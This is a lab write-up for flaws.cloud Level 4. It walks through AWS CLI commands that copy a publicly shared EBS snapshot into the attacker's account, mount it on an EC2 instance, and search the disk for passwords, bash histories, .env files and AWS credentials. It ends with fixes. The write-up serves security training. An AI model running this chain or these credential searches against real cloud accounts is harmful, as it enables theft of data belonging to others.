flaws.cloud — Level 4¶
Vulnerability: Public EBS snapshot exposing the contents of a production server's disk
Core Concepts First¶
Before the commands make sense, you need these three things clear.
EBS vs Other Storage¶
EBS (Elastic Block Store) is a network-attached virtual hard drive for EC2 instances. Think of it exactly like a physical hard drive — it stores your OS, files, databases, config files, credentials. It persists independently of the EC2 instance: you can detach it from one instance and attach it to another, just like unplugging a hard drive and plugging it into a different computer.
| Storage Type | What it is | Persists after EC2 stop? | Accessible across instances? |
|---|---|---|---|
| EBS | Network-attached block storage (virtual hard drive) | Yes | Yes, one at a time |
| Instance Store | Physical disk on the host machine | No — gone when instance stops | No |
| S3 | Object storage (like a file server, not a hard drive) | N/A — not attached to instances | Yes, from anywhere |
| EFS | Network file system (like NFS, shared across instances) | Yes | Yes, simultaneously |
For this attack: EBS is the target because it contains the full filesystem — OS, config files, /etc/passwd, bash history, web app files, .env files, database files, SSH keys, etc.
Snapshot vs Backup — What's the difference?¶
A snapshot is an incremental point-in-time copy of an EBS volume stored in S3 (AWS's internal S3, not your buckets). The reason it's called a "snapshot" and not a "backup" is precise:
- Snapshot: An exact frozen image of the disk at one specific moment. Incremental — only stores blocks that changed since the last snapshot. AWS-native concept.
- Backup: A broader term for any copy of data for recovery purposes. Could be a snapshot, could be a file copy, could be a database dump, could be anything.
All snapshots are backups, but not all backups are snapshots. In AWS, "snapshot" specifically means the EBS incremental block-level copy mechanism.
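The incremental, block-level idea can be sketched in a few lines of Python. This is a toy model to make the concept concrete, not how EBS actually works — "blocks" here are just strings:

```python
def take_snapshot(disk, prev_disk=None):
    """Store only the blocks that changed since the previous disk state."""
    prev = prev_disk or []
    return {i: b for i, b in enumerate(disk) if i >= len(prev) or prev[i] != b}

def restore(snapshot_chain):
    """Replay a chain of incremental snapshots into a full disk image."""
    blocks = {}
    for snap in snapshot_chain:
        blocks.update(snap)
    return [blocks[i] for i in sorted(blocks)]

disk_v1 = ["boot", "etc", "home"]
snap1 = take_snapshot(disk_v1)             # first snapshot: all 3 blocks
disk_v2 = ["boot", "etc-modified", "home"]
snap2 = take_snapshot(disk_v2, disk_v1)    # incremental: only block 1
assert restore([snap1, snap2]) == disk_v2  # the chain rebuilds the exact disk
```

The key property for the attack: restoring the chain reproduces the full disk image, so "incremental" saves the owner storage costs but gives an attacker exactly as much data as a full copy.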
Why are snapshots dangerous when public? A snapshot contains the entire disk at a point in time — every file, every credential, every database row. If you make it public (or accidentally grant its createVolumePermission attribute to the all group), anyone with an AWS account can create a volume from it and read the disk.
Region vs Availability Zone¶
- Region: A geographic area containing multiple data centres. Example: `us-west-2` = Oregon. Fully isolated from other regions.
- Availability Zone (AZ): A specific data centre within a region. Example: `us-west-2a`, `us-west-2b`, `us-west-2c`. AZs within a region are physically separate but connected by low-latency links.
Why does AZ matter for volumes? An EBS volume exists in a specific AZ. The EC2 instance you attach it to must be in the same AZ. You can't attach a volume in us-west-2a to an instance in us-west-2b — different physical data centres, no shared infrastructure. A snapshot, however, is region-level and can be used to create a new volume in any AZ within that region.
The Attack Chain¶
Public snapshot → Create volume from snapshot → Launch EC2 in same AZ → Attach volume → SSH in → Mount disk → Read files
Step 1 — Find the Public Snapshot¶
aws ec2 describe-snapshots \
--owner-ids 975426262029 \
--profile level3 \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
| `aws ec2 describe-snapshots` | List EBS snapshots |
| `--owner-ids 975426262029` | Filter to snapshots owned by this specific AWS account ID (the flaws.cloud account). Without this, you'd get thousands of public AWS snapshots |
| `--profile level3` | Use the credentials you found in level 3 (which belong to the flaws.cloud account) |
| `--region us-west-2` | The region the snapshot is in |
How did we know the account ID? aws sts get-caller-identity with the level 3 credentials returns the Account field — that 12-digit number is the account ID. You use that to filter snapshots to just this account's.
The output gives you the SnapshotId (e.g., snap-0b49342abd1bdcb89) and crucially "IsPublic": true — confirming it's accessible to anyone.
Step 2 — Create a Volume from the Snapshot¶
aws ec2 create-volume \
--snapshot-id snap-0b49342abd1bdcb89 \
--availability-zone us-west-2a \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
| `aws ec2 create-volume` | Create a new EBS volume |
| `--snapshot-id snap-0b49342abd1bdcb89` | Create this volume from the snapshot — it gets an exact copy of the snapshot's data |
| `--availability-zone us-west-2a` | Where to create the volume. Must match the AZ of the EC2 you'll attach it to |
| `--profile default` | Use YOUR credentials (your own AWS account) — not the victim's. You're creating a resource in your own account |
| `--region us-west-2` | The region must match the snapshot's region |
Why your own account? The snapshot is public — anyone can read it. You're creating a volume in your own account as a copy. You're not touching the victim's account. This is why the attack doesn't require compromising their account — just having an AWS account of your own.
Output gives you: VolumeId — e.g., vol-01dc86c00c9998941. Note this down.
{
"VolumeId": "vol-01dc86c00c9998941",
"Size": 8,
"SnapshotId": "snap-0b49342abd1bdcb89",
"AvailabilityZone": "us-west-2a",
"State": "creating",
"Encrypted": false
}
"Encrypted": false — not encrypted. If the snapshot had been encrypted with a KMS key you don't have access to, you'd get a blob of ciphertext and couldn't read anything useful.
Step 3 — Launch an EC2 Instance¶
aws ec2 create-key-pair \
--key-name flaws \
--query 'KeyMaterial' \
--output text \
--profile default \
--region us-west-2 > flaws.pem
chmod 400 flaws.pem
Key pair breakdown:¶
| Part | What it does |
|---|---|
| `aws ec2 create-key-pair` | Generate an RSA key pair on AWS. AWS keeps the public key; you save the private key |
| `--key-name flaws` | The name this key pair will be stored as in AWS |
| `--query 'KeyMaterial'` | Extract only the private key from the JSON response |
| `--output text` | Output as plain text (not JSON) — so it saves cleanly to the file |
| `> flaws.pem` | Redirect stdout to a file. This is your SSH private key |
| `chmod 400 flaws.pem` | Make the key readable only by its owner — SSH refuses to use a private key file with loose permissions |
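What `--query 'KeyMaterial' --output text` does is plain JSON field extraction — roughly equivalent to this Python sketch (the response below is a hypothetical, truncated example, not real key material):

```python
import json

# Hypothetical, truncated create-key-pair response
response = json.loads(r"""
{
  "KeyName": "flaws",
  "KeyFingerprint": "ab:cd:ef:...",
  "KeyMaterial": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----"
}
""")

# --query 'KeyMaterial' picks this one field; --output text prints it raw,
# so the shell redirect writes a clean PEM file instead of quoted JSON
pem = response["KeyMaterial"]
print(pem)
```

Without `--output text` the redirect would capture a JSON-quoted string (escaped newlines and all), and SSH would reject the file.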
aws ec2 run-instances \
--image-id ami-0095b2d932ba790f3 \
--instance-type t3.micro \
--key-name flaws \
--placement AvailabilityZone=us-west-2a \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
| `aws ec2 run-instances` | Launch one or more EC2 instances |
| `--image-id ami-0095b2d932ba790f3` | The AMI (Amazon Machine Image) — the OS template. This is Amazon Linux 2023 |
| `--instance-type t3.micro` | The hardware spec — 2 vCPUs, 1 GB RAM. Free tier eligible |
| `--key-name flaws` | Which key pair to install on the instance for SSH access |
| `--placement AvailabilityZone=us-west-2a` | Must match the AZ of the volume you created |
| `--profile default` | Your credentials |
| `--region us-west-2` | Region |
AMI (Amazon Machine Image): Think of it as a USB drive with a pre-installed OS. You pick which OS you want, it boots from that image. Different regions have different AMI IDs for the same OS — AMI IDs are region-specific.
Step 4 — Open SSH Access to Your IP¶
The EC2 launches with a security group that blocks all inbound traffic by default. You need to open port 22 (SSH) for your IP only.
# Get your public IP first
curl ifconfig.me
# Open SSH to your IP only
aws ec2 authorize-security-group-ingress \
--group-id sg-07532e1d41680d621 \
--protocol tcp \
--port 22 \
--cidr <YOUR_IP>/32 \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
| `authorize-security-group-ingress` | Add an inbound allow rule to a security group |
| `--group-id sg-07532e1d41680d621` | The security group ID (from the run-instances output) |
| `--protocol tcp` | TCP protocol (SSH uses TCP) |
| `--port 22` | SSH port |
| `--cidr <YOUR_IP>/32` | Allow ONLY your specific IP. /32 means exactly that one IP address (no range) |
Security group = AWS's virtual firewall. Works at the instance network interface level. Stateful — if you allow inbound on port 22, the return traffic is automatically allowed without an explicit outbound rule.
/32 CIDR notation: CIDR notation describes IP ranges. /32 means a single IP (all 32 bits are fixed). /24 would be a whole subnet (256 IPs). /0 would be every IP on the internet. Using /32 means only your exact IP can SSH in.
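You can verify those range sizes with Python's standard ipaddress module (203.0.113.x is a reserved documentation address, standing in for your real IP):

```python
import ipaddress

# /32 fixes all 32 bits: exactly one address
print(ipaddress.ip_network("203.0.113.7/32").num_addresses)   # 1
# /24 fixes 24 bits, leaving 8 host bits: 256 addresses
print(ipaddress.ip_network("203.0.113.0/24").num_addresses)   # 256
# /0 fixes nothing: the entire IPv4 internet
print(ipaddress.ip_network("0.0.0.0/0").num_addresses)        # 4294967296
```

The general rule: a /N prefix leaves 32 − N free host bits, so the range covers 2^(32−N) addresses.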
Step 5 — Attach the Volume¶
aws ec2 attach-volume \
--volume-id vol-01dc86c00c9998941 \
--instance-id i-02e76e84fbe738592 \
--device /dev/sdf \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
| `attach-volume` | Attach an EBS volume to a running EC2 instance |
| `--volume-id` | The volume you created from the snapshot |
| `--instance-id` | Your EC2 instance (from the run-instances output) |
| `--device /dev/sdf` | The device name to expose the volume as inside the OS. /dev/sdf through /dev/sdp are conventional names for attached EBS volumes |
| `--profile default` | Your credentials |
| `--region us-west-2` | Must match both the volume's and the instance's region |
Both must be in the same AZ. If they weren't, this command would fail with a zone mismatch error. This is why you specified us-west-2a for both when creating the volume and launching the instance.
Step 6 — SSH In and Find the Volume¶
# Get the public IP of your instance
aws ec2 describe-instances \
--instance-ids i-02e76e84fbe738592 \
--profile default \
--region us-west-2 \
--query 'Reservations[0].Instances[0].PublicIpAddress' \
--output text
# SSH in (ec2-user is the default for Amazon Linux)
ssh -i flaws.pem ec2-user@52.25.143.249
Default SSH usernames by distro:¶
| AMI/OS | Default username |
|---|---|
| Amazon Linux | ec2-user |
| Ubuntu | ubuntu |
| Debian | admin |
| CentOS | centos |
| RHEL | ec2-user |
| SUSE | ec2-user |
-i flaws.pem = identity file flag. Tells SSH which private key to authenticate with. Must match the key pair you specified when launching the instance.
Step 7 — lsblk to Identify the Disk¶
lsblk
Output:
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
nvme0n1 259:0 0 30G 0 disk
├─nvme0n1p1 259:1 0 30G 0 part /
├─nvme0n1p127 259:2 0 1M 0 part
└─nvme0n1p128 259:3 0 10M 0 part /boot/efi
nvme1n1 259:4 0 8G 0 disk
└─nvme1n1p1 259:5 0 8G 0 part
lsblk breakdown:¶
lsblk = list block devices. A block device is anything that stores data in fixed-size blocks — hard drives, SSDs, virtual disks, USBs.
| Column | Meaning |
|---|---|
| `NAME` | Device name |
| `MAJ:MIN` | Major/minor device numbers (kernel internal — ignore) |
| `RM` | Removable? (0 = no, 1 = yes) |
| `SIZE` | Disk/partition size |
| `RO` | Read-only? (0 = no) |
| `TYPE` | disk = whole device, part = partition |
| `MOUNTPOINTS` | Where it's mounted (empty = not yet mounted) |
Why nvme1n1 and not nvme0n1?¶
- `nvme0n1` is 30G — that's the root volume of your EC2 instance (the OS disk). It's mounted at `/`.
- `nvme1n1` is 8G — that matches the `"Size": 8` from the snapshot/volume creation output. This is the attached disk.
The naming convention: nvme = NVMe (the interface protocol AWS uses for EBS on modern instances). 0n1 = controller 0, namespace 1 (the first disk). 1n1 = controller 1, namespace 1 (the second disk).
Modern AWS instances expose EBS volumes as NVMe devices even though you specified /dev/sdf in the attach command — the OS translates that to nvme1n1. Older instance types show xvdf, xvdg, etc. lsblk always shows you the actual device name the kernel sees.
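Picking the right device here is easy by eye, but the logic — a whole disk, not mounted, whose size matches the 8G volume — is mechanical. A sketch in Python against the lsblk output above (tree glyphs stripped for simplicity):

```python
# Sample lsblk output, as seen on the instance (tree characters removed)
lsblk = """\
nvme0n1     259:0 0  30G 0 disk
nvme0n1p1   259:1 0  30G 0 part /
nvme0n1p127 259:2 0   1M 0 part
nvme0n1p128 259:3 0  10M 0 part /boot/efi
nvme1n1     259:4 0   8G 0 disk
nvme1n1p1   259:5 0   8G 0 part
"""

attached = None
for line in lsblk.splitlines():
    # Columns: NAME MAJ:MIN RM SIZE RO TYPE [MOUNTPOINT]
    name, _majmin, _rm, size, _ro, dtype, *mountpoint = line.split()
    # Whole disk, size matches the snapshot's 8G, and nothing mounted on it
    if dtype == "disk" and size == "8G" and not mountpoint:
        attached = name

print(attached)  # nvme1n1
```

In practice `lsblk --json` gives you the same fields as structured JSON, which avoids hand-parsing columns.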
Step 8 — Mount and Read¶
sudo mkdir /mnt/flaws
sudo mount /dev/nvme1n1p1 /mnt/flaws
Breakdown:¶
| Command | What it does |
|---|---|
| `mkdir /mnt/flaws` | Create a mount point — just an empty directory that acts as the entry point to the volume |
| `mount /dev/nvme1n1p1 /mnt/flaws` | Mount partition 1 of the attached volume at that directory. Everything on the volume's filesystem is now accessible under /mnt/flaws/ |
| `sudo` | Root required for both — mounting is a privileged operation |
Why nvme1n1p1 and not nvme1n1? The p1 means partition 1. The disk (nvme1n1) has a partition table, and the actual filesystem lives on the first partition (p1). You always mount partitions, not raw disks (unless the disk has no partition table). lsblk showed nvme1n1p1 nested under nvme1n1 — that's how you know the partition structure.
Step 9 — Enumerate the Mounted Disk¶
ls /mnt/flaws # see the filesystem layout
cat /mnt/flaws/etc/passwd # list all user accounts on the original server
cat /mnt/flaws/home/*/.bash_history # command history of all users
find /mnt/flaws -name "*.conf" 2>/dev/null # config files
find /mnt/flaws -name "*.env" 2>/dev/null # .env files (often contain DB passwords, API keys)
find /mnt/flaws -name "credentials" 2>/dev/null # AWS credentials files
cat /mnt/flaws/var/www/html/*.php 2>/dev/null # web app source code
You now have unrestricted read access to the entire disk of the original server. Every file, every config, and every credential present at the moment the snapshot was taken is readable.
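The ad-hoc find commands above generalise into a small directory walker. A hypothetical helper (the filename list is illustrative — on the real box you'd point it at /mnt/flaws):

```python
import os

# Filenames that commonly hold secrets — the same targets as the find
# commands above (illustrative list, extend as needed)
SENSITIVE_NAMES = {".env", "credentials", "id_rsa", ".bash_history"}
SENSITIVE_SUFFIXES = (".conf", ".pem")

def find_secrets(root):
    """Walk a mounted filesystem and return paths likely to hold secrets."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if name in SENSITIVE_NAMES or name.endswith(SENSITIVE_SUFFIXES):
                hits.append(os.path.join(dirpath, name))
    return hits
```

Usage on the instance would be `find_secrets("/mnt/flaws")` — because the volume is mounted read-only to you as root, nothing on the original server's filesystem is off-limits.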
Utility Commands¶
# List your volumes
aws ec2 describe-volumes --profile default --region us-west-2
# List instances with IDs and states (table format)
aws ec2 describe-instances \
--profile default \
--region us-west-2 \
--query 'Reservations[].Instances[].[InstanceId,State.Name]' \
--output table
# Terminate instances when done (avoid charges)
aws ec2 terminate-instances \
--instance-ids i-02e76e84fbe738592 \
--profile default \
--region us-west-2
Vulnerability Summary¶
The flaw: an EBS snapshot whose createVolumePermission attribute was granted to the all group — publicly copyable by any AWS account.
Why you needed your own AWS account: The snapshot is public, but "public" in AWS means "any authenticated AWS user can use it." You create the volume in your own account, billed to you, and you own it. The victim's account is never touched after step 1.
Why AZ matters: EBS volumes are AZ-scoped physical resources. An instance and its attached volume must be in the same AZ because they're connected over local network fabric within that data centre. Cross-AZ EBS attachment is architecturally impossible.
Why nvme1n1 was the right device:
nvme0n1 (30G) = your EC2's root OS disk. nvme1n1 (8G) = the attached volume. You matched it by size to the snapshot's VolumeSize: 8.
Full attack chain:
1. Get level 3 credentials via git history
2. describe-snapshots --owner-ids <account-id> → find public snapshot
3. create-volume --snapshot-id <id> --availability-zone us-west-2a → clone into your account
4. run-instances --placement AvailabilityZone=us-west-2a → launch EC2 in same AZ
5. attach-volume → attach the cloned disk
6. SSH in → lsblk → identify the attached disk → mount it
7. Read everything: bash history, .env files, web app code, AWS credentials
8. Find the next level's URL in the files
The fix:
- Snapshots should be private by default — never set createVolumePermission: all
- Encrypt EBS volumes with KMS. Even if a snapshot is public, encrypted data is useless without the KMS key
- Audit periodically: aws ec2 describe-snapshots --owner-ids self --restorable-by-user-ids all lists your snapshots that any AWS account can restore